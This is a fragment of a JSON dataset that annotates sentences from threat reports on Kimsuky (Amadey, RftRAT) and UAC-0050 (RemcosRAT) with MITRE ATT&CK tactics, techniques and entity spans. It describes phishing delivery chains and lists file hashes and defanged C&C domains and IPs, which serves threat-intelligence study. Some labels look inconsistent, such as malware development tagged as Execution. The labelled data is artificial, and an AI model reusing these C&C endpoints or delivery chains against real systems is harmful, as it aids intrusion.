"entities": null }, { "uid": "aptnotes-02_aptnotes_report-p17-s125-24028b", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 17, "sentence_id": 125, "context_before": "The port number 3389 configured in the default address indicates that it is likely to establish an RDP connection to a private network.", "sentence_text": "The Kimsuky threat group is continuously launching spear phishing attacks against South Korean users.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "The Kimsuky group launches spear phishing attacks targeting South Korean users.", "entities": [ { "text": "Kimsuky threat group", "start": 4, "end": 24, "label": "ThreatActor" }, { "text": "launching spear phishing attacks", "start": 41, "end": 73, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p17-s126-7b715c", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 17, "sentence_id": 126, "context_before": "The Kimsuky threat group is continuously launching spear phishing attacks...", "sentence_text": "The group usually employs the method of distributing malware through attachments or download links in emails.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Phishing: Spearphishing Attachment" } ], "procedure": "The group distributes malware via email.", "entities": [ { "text": "employs", "start": 18, "end": 25, "label": "Action" }, { "text": "distributing", "start": 40, "end": 52, "label": "Action" }, { "text": "attachments", "start": 69, "end": 80, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-02_aptnotes_report-p17-s127-d9bdba", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 17, "sentence_id": 127, "context_before": "The files are disguised as legitimate documents to lure victims into opening them.", "sentence_text": "When a user executes them, the threat actor may be able to take control of the system.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Execute malicious files to gain control of the system.", "entities": [ { "text": "executes them", "start": 12, "end": 25, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p17-s128-3fb5f6", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 17, "sentence_id": 128, "context_before": "When a user executes them, the threat actor may be able to take control of the system that is currently in use.", "sentence_text": "The Kimsuky group has been newly creating and using various malware to control infected systems and steal information.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1587.001", "name": "Develop Capabilities: Malware" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Create and use malware to control infected systems and steal information.", "entities": [ { "text": "Kimsuky group", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "creating and using various malware", "start": 33, "end": 67, "label": "Action" }, { "text": "various malware", "start": 52, "end": 67, "label": "MalwareTool" }, { "text": "control infected systems", "start": 71, "end": 95, "label": "Action" }, { "text": "steal information", "start": 100, "end": 117, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p17-s129-f5e2d4", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 17, "sentence_id": 129, "context_before": "The Kimsuky group has been newly creating and using various malware to control infected systems and steal information.", "sentence_text": "Recently, the group has been using AutoIt to create malware to bypass security products.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Use AutoIt to create malware that bypasses security products.", "entities": [ { "text": "using AutoIt", "start": 29, "end": 41, "label": "Action" }, { "text": "AutoIt", "start": 35, "end": 41, "label": "MalwareTool" }, { "text": "create malware", "start": 45, "end": 59, "label": "Action" }, { "text": "bypass security products", "start": 63, "end": 87, "label": "Action" } ] }, { "uid": "aptnotes-02_aptnotes_report-p17-s130-d7971c", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 17, "sentence_id": 130, "context_before": "Recently, the group has been using AutoIt to create malware to bypass security products.", "sentence_text": "Users must carefully check the senders of emails and refrain from opening files from unknown sources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p17-s131-b2b7d1", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 17, "sentence_id": 131, "context_before": "Users must carefully check the senders of emails and refrain from opening files from unknown sources.", "sentence_text": "It is also recommended to apply the latest patch for OS and programs such as Internet browsers and update V3 to the latest version to prevent such malware infection in advance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p17-s132-5e2621", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 17, "sentence_id": 132, "context_before": "It is also recommended to apply the latest patch for OS and programs such as Internet browsers and update V3 to the latest version to prevent such malware infection in advance.", "sentence_text": "File Detection\n– Downloader/Win.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p17-s136-96134e", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 17, "sentence_id": 136, "context_before": "Amadey.", "sentence_text": "C5462118 (2023.07.28.03)\n– Trojan/AU3.Loader (2023.11.22.01)\n– Dropper/Win.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p18-s162-8db201", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 18, "sentence_id": 162, "context_before": "Agent.", "sentence_text": "C5430095 (2023.05.20.00)\nBehavior Detection\n– Persistence/MDP.AutoIt.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p18-s163-ac24fe", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 18, "sentence_id": 163, "context_before": "C5430095 (2023.05.20.00)\nBehavior Detection\n– Persistence/MDP.AutoIt.", "sentence_text": "M4766\n– Injection/MDP.Hollowing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p18-s164-98e4cd", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 18, "sentence_id": 164, "context_before": "M4766\n– Injection/MDP.Hollowing.", "sentence_text": "M4767\nIOC\nMD5\n– f5ea621f482f9ac127e8f7b784733514 : RftRAT Dropper – AutoIt (d009086.dll)\n– 7b6471f4430c2d6907ce4d349f59e69f : Amadey – AutoIt Script (adal.au3)\n– 14a7f83d6215a4d4c426ad371e0810a2 : RftRAT – AutoIt Script (run.au3)\n– 74d5dac64c0740d3ff5a9e3aca51ccdf : RftRAT –", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p18-s165-17cfd9", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 18, "sentence_id": 165, "context_before": "M4767\nIOC\nMD5\n– f5ea621f482f9ac127e8f7b784733514 : RftRAT Dropper – AutoIt (d009086.dll)\n– 7b6471f4430c2d6907ce4d349f59e69f : Amadey – AutoIt Script (adal.au3)\n– 14a7f83d6215a4d4c426ad371e0810a2 : RftRAT – AutoIt Script (run.au3)\n– 74d5dac64c0740d3ff5a9e3aca51ccdf : RftRAT –", "sentence_text": "AutoIt Script (chkdisc.au3)\n– a7c9b4d70e4fad86598de37d7bf1fe96 : RftRAT – AutoIt Script (run.au3)\n– 32696d9e1e72affaf8bc707ab271200d : Loader (ht.dll)\n– 4b667f7ea5bdc9d872774f733fdf4d6a : Loader (ht.dll)\n– 7f582f0c5c9a14c736927d4dbb47c5fa : Loader (ht.dll)\n– 94aef716b23e8fa96808f1096724f77f : Loader (ht.dll)\n– 0786984ab46482637c2d483ffbaf66dc : Loader (ht.dll)\n– 1f63ce3677253636a273a88c5b26418d :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p18-s166-af8862", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 18, "sentence_id": 166, "context_before": "AutoIt Script (chkdisc.au3)\n– a7c9b4d70e4fad86598de37d7bf1fe96 : RftRAT – AutoIt Script (run.au3)\n– 32696d9e1e72affaf8bc707ab271200d : Loader (ht.dll)\n– 4b667f7ea5bdc9d872774f733fdf4d6a : Loader (ht.dll)\n– 7f582f0c5c9a14c736927d4dbb47c5fa : Loader (ht.dll)\n– 94aef716b23e8fa96808f1096724f77f : Loader (ht.dll)\n– 0786984ab46482637c2d483ffbaf66dc : Loader (ht.dll)\n– 1f63ce3677253636a273a88c5b26418d :", "sentence_text": "Loader (ht.dll)\n– 6f7cd8c0d9bfb0f97083e4431e4944c1 : Amadey Dropper (10.dll)\n– 4fc726ab835ce559bada42e695b3d341 : Amadey Dropper (11.dll)\n– 0fc1c99fd0d6f5488ab77e296216c7c6 : Amadey Dropper (10.dll)\n– f9c4d236b893c0d72321a9210359f530 : Amadey (svc4615.dll)\n– e22336eaf1980d2be5feed61b2dbc839 : Amadey (svc7014.dll)\n– 862a855557cc274ab86e226e45338cff : Amadey (mtms2883.dll)\n– 0f5762be09db44b2f0ccf05822c8531a : Amadey (ad53.dat)\n– c87094e261860e3a1f70b0681e1bc8c5 :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p18-s167-c0a9bb", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 18, "sentence_id": 167, "context_before": "Loader (ht.dll)\n– 6f7cd8c0d9bfb0f97083e4431e4944c1 : Amadey Dropper (10.dll)\n– 4fc726ab835ce559bada42e695b3d341 : Amadey Dropper (11.dll)\n– 0fc1c99fd0d6f5488ab77e296216c7c6 : Amadey Dropper (10.dll)\n– f9c4d236b893c0d72321a9210359f530 : Amadey (svc4615.dll)\n– e22336eaf1980d2be5feed61b2dbc839 : Amadey (svc7014.dll)\n– 862a855557cc274ab86e226e45338cff : Amadey (mtms2883.dll)\n– 0f5762be09db44b2f0ccf05822c8531a : Amadey (ad53.dat)\n– c87094e261860e3a1f70b0681e1bc8c5 :", "sentence_text": "Amadey (ad54.dat)\n– bac7f5eefe6a67e9555e93b0d950db59 : Amadey (d021999.dll)\n– c5a1305aba22c8fedd6624753849905b : Amadey (mtms02.dat)\n– 068d395c60e32f01b5424e2a8591ba73 : Amadey (adal66.dat)\n– f3caa0f922600b4423ebcb16d7ea2dc6 : RftRAT Dropper (_e2.dll)\n– 355817015c8510564c6ac89c976f2416 : RftRAT Dropper (_d2.dll)\n– d541aa6bae0f8c9bd7e7b6193b52e8f2 : RftRAT Dropper (d010943.dll)\n– 093608a2d6eb098eb7ea917cc22e9998 : RftRAT Dropper (30.dll)\n– f76cde928a6eda27793ade673bcd6620 : RftRAT (msc1439.dll)\n– aaa42b1209ed54bfcbd2493fe073d59b : RftRAT (mtms1929.dll)\n– 1003a440c710ddf7faa1a54919dd01d8 : RftRAT (rtm8668.dll)\n– b67e6e4c16e0309cfc2511414915df15 : RftRAT (cmms1106.dll)\n– 4d4d485d3bfd3cbc97ed4b9a671f740f : RftRAT (cmms2366.dll)\n– cf3440fa165e3f78d2a2252a6924f702 : RftRAT (mtms7794.dll)\n18/20", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p19-s168-721c20", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 19, "sentence_id": 168, "context_before": "Amadey (ad54.dat)\n– bac7f5eefe6a67e9555e93b0d950db59 : Amadey (d021999.dll)\n– c5a1305aba22c8fedd6624753849905b : Amadey (mtms02.dat)\n– 068d395c60e32f01b5424e2a8591ba73 : Amadey (adal66.dat)\n– f3caa0f922600b4423ebcb16d7ea2dc6 : RftRAT Dropper (_e2.dll)\n– 355817015c8510564c6ac89c976f2416 : RftRAT Dropper (_d2.dll)\n– d541aa6bae0f8c9bd7e7b6193b52e8f2 : RftRAT Dropper (d010943.dll)\n– 093608a2d6eb098eb7ea917cc22e9998 : RftRAT Dropper (30.dll)\n– f76cde928a6eda27793ade673bcd6620 : RftRAT (msc1439.dll)\n– aaa42b1209ed54bfcbd2493fe073d59b : RftRAT (mtms1929.dll)\n– 1003a440c710ddf7faa1a54919dd01d8 : RftRAT (rtm8668.dll)\n– b67e6e4c16e0309cfc2511414915df15 : RftRAT (cmms1106.dll)\n– 4d4d485d3bfd3cbc97ed4b9a671f740f : RftRAT (cmms2366.dll)\n– cf3440fa165e3f78d2a2252a6924f702 : RftRAT (mtms7794.dll)\n18/20", "sentence_text": "– c55da826e50e2615903607e61968778f : RftRAT – d070cf19b66da341f64c01f8195afaed : RftRAT (r2.dat)\n– e665a985f71567f24a293ea430aad67d : RftRAT (r2.dat)\n– c52410ed6787c39db87c4158e73089d4 : RftRAT (r1.dat)\n– 1ac0b0da11e413a21bec08713e1e7c59 : RftRAT (40.dat)\n– 39e755c08156123e4cabac6bf8d1fd3a : RftRAT (a2.dat)\n– 187aa9b12c05cd1ff030044786903e7e : KeyLogger (NsiService.exe)\n– b1337eb53b21594ac5dbd76138054ffb : KeyLogger (NsiService.exe)\n– d820ddb3026a5960b2c6f39780480d28 : KeyLogger (NsiService.exe)\n– 5c2809177bb95edc68f9a08a96420bb7 :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p19-s169-e88443", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 19, "sentence_id": 169, "context_before": "– c55da826e50e2615903607e61968778f : RftRAT – d070cf19b66da341f64c01f8195afaed : RftRAT (r2.dat)\n– e665a985f71567f24a293ea430aad67d : RftRAT (r2.dat)\n– c52410ed6787c39db87c4158e73089d4 : RftRAT (r1.dat)\n– 1ac0b0da11e413a21bec08713e1e7c59 : RftRAT (40.dat)\n– 39e755c08156123e4cabac6bf8d1fd3a : RftRAT (a2.dat)\n– 187aa9b12c05cd1ff030044786903e7e : KeyLogger (NsiService.exe)\n– b1337eb53b21594ac5dbd76138054ffb : KeyLogger (NsiService.exe)\n– d820ddb3026a5960b2c6f39780480d28 : KeyLogger (NsiService.exe)\n– 5c2809177bb95edc68f9a08a96420bb7 :", "sentence_text": "Stealer – Web browser (GBIA.exe)\n– 0bf558adde774215bb221465a4edd2fe : Stealer – Web browser (GBIA.exe)\n– aa2cf925bae24c5cad2b1e1ad745b881 : Stealer – Web browser (GPIA.dll)\n– baa058003bf79ba82ac1b744ed8d58cb :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p19-s170-b487cf", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 19, "sentence_id": 170, "context_before": "Stealer – Web browser (GBIA.exe)\n– 0bf558adde774215bb221465a4edd2fe : Stealer – Web browser (GBIA.exe)\n– aa2cf925bae24c5cad2b1e1ad745b881 : Stealer – Web browser (GPIA.dll)\n– baa058003bf79ba82ac1b744ed8d58cb :", "sentence_text": "Stealer – Chrome extension (GBS.exe)\n– 38182f1f0a1cf598295cfbbabd9c5bf4 : Stealer – File path (GPIA.exe)\n– 272c29bf65680b1ac8ec7f518780ba92 : Stealer – File path (GPIA.exe)\n– e860dac57933f63be9a374fb78bca209 : Proxy (svc.exe)\n– e96ca2aa7c6951802e4b17649cc5b581 : Injector (taskhosts.exe)\n– 4eddf54757ae168450882176243d2bd2 : Injector (sihosts.exe)\n– 119063c82373598d00d17734dd280016 : LogonMon (ipcheck.dll)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p19-s171-7166cf", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 19, "sentence_id": 171, "context_before": "Stealer – Chrome extension (GBS.exe)\n– 38182f1f0a1cf598295cfbbabd9c5bf4 : Stealer – File path (GPIA.exe)\n– 272c29bf65680b1ac8ec7f518780ba92 : Stealer – File path (GPIA.exe)\n– e860dac57933f63be9a374fb78bca209 : Proxy (svc.exe)\n– e96ca2aa7c6951802e4b17649cc5b581 : Injector (taskhosts.exe)\n– 4eddf54757ae168450882176243d2bd2 : Injector (sihosts.exe)\n– 119063c82373598d00d17734dd280016 : LogonMon (ipcheck.dll)", "sentence_text": "C&C\n– hxxps://prohomepage[.]net/index.php :Amadey – AutoIt", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-02_aptnotes_report-p19-s172-46d474", "source": "aptnotes", "doc_id": "02_aptnotes_report", "page_number": 19, "sentence_id": 172, "context_before": "C&C\n– hxxps://prohomepage[.]net/index.php :Amadey – AutoIt", "sentence_text": "Script – hxxp://brhosting[.]net/index.php : Amadey – hxxps://topspace[.]org/index.php : Amadey – hxxps://theservicellc[.]com/index.php : Amadey – hxxps://splitbusiness[.]com/index.php : Amadey – hxxps://techgolfs[.]com/index.php : Amadey – 23.236.181[.]108:52390 : RftRAT – 152.89.247[.]57:52390 : RftRAT – 172.93.201[.]248:8083 : RftRAT – 172.93.201[.]248:52390 : RftRAT – 209.127.37[.]40:52390 : RftRAT Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p1-s1-c05939", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "CERT-UA\ncert.gov.ua/article/6276824\ngeneral information\nOn 21.12.2023, the Government Computer Emergency Response Team of Ukraine CERT- UA recorded a mass distribution of e-mails with the subject \"Debts under the Kyivstar contract\" and an attachment in the form of an archive \"Subscriber's debt.zip\".", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p1-s2-13e0ba", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "CERT-UA\ncert.gov.ua/article/6276824\ngeneral information\nOn 21.12.2023, the Government Computer Emergency Response Team of Ukraine CERT- UA recorded a mass distribution of e-mails with the subject \"Debts under the Kyivstar contract\" and an attachment in the form of an archive \"Subscriber's debt.zip\".", "sentence_text": "The specified ZIP-archive contains the RAR-archive \"Subscriber's debt.rar\" divided into 2 parts, in which there is a password-protected archive of the same name.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p1-s3-939573", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "The specified ZIP-archive contains the RAR-archive \"Subscriber's debt.rar\" divided into 2 parts, in which there is a password-protected archive of the same name.", "sentence_text": "In the latter, there is a document with the macro \"Subscriber Debt.doc\".", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p1-s4-1fe2ce", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "In the latter, there is a document with the macro \"Subscriber Debt.doc\".", "sentence_text": "If activated, the macro code will download to the PC and launch the \"GB.exe\" file using the file explorer (explorer.exe) using the SMB protocol.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1204.002", "name": "User Execution: Malicious File" } ], "procedure": "The macro downloads and launches a malicious executable.", "entities": [ { "text": "download to the PC", "start": 34, "end": 52, "label": "Action" }, { "text": "launch the \"GB.exe\" file", "start": 57, "end": 81, "label": "Action" }, { "text": "GB.exe", "start": 69, "end": 75, "label": "MalwareTool" }, { "text": "explorer.exe", "start": 107, "end": 119, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-03_aptnotes_report-p1-s5-d7688f", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "If activated, the macro code will download to the PC and launch the \"GB.exe\" file using the file explorer (explorer.exe) using the SMB protocol.", "sentence_text": "In turn, the specified file is an SFX archive containing a BATCH script for downloading from the bitbucket service and launching the executable file \"wsuscr.exe\", obfuscated with the help of SmartAssembly .NET, the purpose of which is to decrypt and launch the RemcosRAT remote control program (identifier license: 5639D40461DCDD07011A2B87AD3C9EDD).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "The archive contains a script that downloads a payload from Bitbucket, executes wsuscr.exe, and decrypts and launches RemcosRAT.", "entities": [ { "text": "downloading from the bitbucket service", "start": 76, "end": 114, "label": "Action" }, { "text": "launching the executable file \"wsuscr.exe\"", "start": 119, "end": 161, "label": "Action" }, { "text": "decrypt and launch the RemcosRAT remote control program", "start": 238, "end": 293, "label": "Action" }, { "text": "wsuscr.exe", "start": 150, "end": 160, "label": "MalwareTool" }, { "text": "RemcosRAT", "start": 261, "end": 270, "label": "MalwareTool" } ] }, { "uid": "aptnotes-03_aptnotes_report-p1-s6-29c7fd", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "In turn, the specified file is an SFX archive containing a BATCH script for downloading from the bitbucket service and launching the executable file \"wsuscr.exe\", obfuscated with the help of SmartAssembly .NET, the purpose of which is to decrypt and launch the RemcosRAT remote control program (identifier license: 5639D40461DCDD07011A2B87AD3C9EDD).", "sentence_text": "In addition, letters with the subject \"SBU request\" and an attachment in the form of a \"Documents.zip\" archive containing a password-protected and divided into 3 RAR-archives \"Request.rar\" were recorded.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p1-s7-2bd87b", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "In addition, letters with the subject \"SBU request\" and an attachment in the form of a \"Documents.zip\" archive containing a password-protected and divided into 3 RAR-archives \"Request.rar\" were recorded.", "sentence_text": "In the latter, the executable file \"Request.exe\" is located.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p1-s8-832663", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "In the latter, the executable file \"Request.exe\" is located.", "sentence_text": "If such an archive is opened and the executable files run, the computer infected with the RemcosRAT program (License ID: 5639D40461DCDD07011A2B87AD3C9EDD).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "User Execution: Malicious File" } ], "procedure": "Running the executable infects the system with RemcosRAT.", "entities": [ { "text": "opened and the executable files run", "start": 22, "end": 57, "label": "Action" }, { "text": "infected with the RemcosRAT program", "start": 72, "end": 107, "label": "Action" }, { "text": "RemcosRAT", "start": 90, "end": 99, "label": "MalwareTool" } ] }, { "uid": "aptnotes-03_aptnotes_report-p1-s9-f10ffd", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "If such an archive is opened and the executable files run, the computer may be infected with the RemcosRAT program (License ID: 5639D40461DCDD07011A2B87AD3C9EDD).", "sentence_text": "In addition to the typical UAC-0050 location of the RemcosRAT management servers at the technical site of the Malaysian hosting provider Shinjiru, they are also located within the autonomous system AS44477 (STARK INDUSTRIES SOLUTIONS LTD).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p1-s10-02302f", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "In addition to the typical UAC-0050 location of the RemcosRAT management servers at the technical site of the Malaysian hosting provider Shinjiru, they are also located within the autonomous system AS44477 (STARK INDUSTRIES SOLUTIONS LTD).", "sentence_text": "Indicators of cyber threats Files:\n1/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p2-s11-12439b", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 2, "sentence_id": 11, "context_before": "Indicators of cyber threats Files:\n1/6", "sentence_text": "4754f0ede14f1bae26b69bd43c7b6705\n8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a Debt of the subscriber.zip fb9ce204ff2b2f8014a547a2de568327 ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449 Subscriber's debt.part1.rar fc196e76dee54125e5fc15018d764fcf 9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba Subscriber's debt.part2.rar 324afa8304dc6a079e8f9a2f2ea9654f 1173c9fc2e4fd5eba9ca7492902f860d6b5aac65f1c5d1415aa2cb86f260b94a Automatic access code.txt 1d1d06ebd13ed9a3ea9254962a4c189f 823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827 Debt of the subscriber.rar de2e053acae98adbecc23ab3c0e9cf5d 93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7 Debt of the subscriber.doc c3e7cfa2e076c3ca421ddc00496c71b5 d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c GB.exe 6c704bae1033920b576dacbcff6bfef5 7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c test2.exe 628ef6dc40f8b6e89b6d537463add174 8272c8939a325be870bcde372842b808a015d2b892e239e16a6211a5c0b4c789 test2.bat fc99e0883a1fa153693547953a83674e 6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d wsuscr.exe 490a5462fc6e4f477811ee08a00c7c85 a18876e286ea71d6d0098f6daa61a456fe1a2c176ab025668bbe5d64feafb829 remcos.exe 62f588d655331f053795087b657743fe 9666d03d9770f87436114fc726790b53b8b625bb9cf36902d040afcef6080dce Documents.zip 1ac510cf6c0d34f5148e3136494a2366 1279c4f75e61a2213f9bcb7a14922f9c282d7a647fd4b058ad27c84d7a0f315d Request.part1.rar 57ea2a297e1881d1015634c3e9b7c66d 7a100ddd648c57fd4cf4ef12692380deff557c6630a7c9b2d740f69d5c1941a3 Request.part2.rar f677caecda3825f2553c0e0dcdf3c1b8 eeed029e8b392301e8f4d17492f2de3640925bfe785a0bf784141c384808a1fb Request.part3.rar d4f5c321818c7876c6fffffe3e1fc30e 76f1c40c7ff5dda070703cc4f07a5f5d3489fcfa65884ad91fb33a74303ebd43", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p2-s12-8eeb0c", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "4754f0ede14f1bae26b69bd43c7b6705\n8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a Debt of the subscriber.zip fb9ce204ff2b2f8014a547a2de568327 ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449 Subscriber's debt.part1.rar fc196e76dee54125e5fc15018d764fcf 9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba Subscriber's debt.part2.rar 324afa8304dc6a079e8f9a2f2ea9654f 1173c9fc2e4fd5eba9ca7492902f860d6b5aac65f1c5d1415aa2cb86f260b94a Automatic access code.txt 1d1d06ebd13ed9a3ea9254962a4c189f 823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827 Debt of the subscriber.rar de2e053acae98adbecc23ab3c0e9cf5d 93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7 Debt of the subscriber.doc c3e7cfa2e076c3ca421ddc00496c71b5 d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c GB.exe 6c704bae1033920b576dacbcff6bfef5 7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c test2.exe 628ef6dc40f8b6e89b6d537463add174 8272c8939a325be870bcde372842b808a015d2b892e239e16a6211a5c0b4c789 test2.bat fc99e0883a1fa153693547953a83674e 6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d wsuscr.exe 490a5462fc6e4f477811ee08a00c7c85 a18876e286ea71d6d0098f6daa61a456fe1a2c176ab025668bbe5d64feafb829 remcos.exe 62f588d655331f053795087b657743fe 9666d03d9770f87436114fc726790b53b8b625bb9cf36902d040afcef6080dce Documents.zip 1ac510cf6c0d34f5148e3136494a2366 1279c4f75e61a2213f9bcb7a14922f9c282d7a647fd4b058ad27c84d7a0f315d Request.part1.rar 57ea2a297e1881d1015634c3e9b7c66d 7a100ddd648c57fd4cf4ef12692380deff557c6630a7c9b2d740f69d5c1941a3 Request.part2.rar f677caecda3825f2553c0e0dcdf3c1b8 eeed029e8b392301e8f4d17492f2de3640925bfe785a0bf784141c384808a1fb Request.part3.rar d4f5c321818c7876c6fffffe3e1fc30e 76f1c40c7ff5dda070703cc4f07a5f5d3489fcfa65884ad91fb33a74303ebd43", "sentence_text": "Code 275376.txt 75bc7617d832a378a533d896223587bc d59b1ace28e0b35a0bd54fa0ca95f92082b17fa4109fb3f3d0be33ca60834660 Request.exe 0bff5c030f8c781c604fb589c6bfc5a6 be878c37bfab2d6ea7b460d74312523317e3377927222f87aa3ce92f6ebc5bcd", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-03_aptnotes_report-p2-s13-23a588", "source": "aptnotes", "doc_id": "03_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "Code 275376.txt 75bc7617d832a378a533d896223587bc d59b1ace28e0b35a0bd54fa0ca95f92082b17fa4109fb3f3d0be33ca60834660 Request.exe 0bff5c030f8c781c604fb589c6bfc5a6 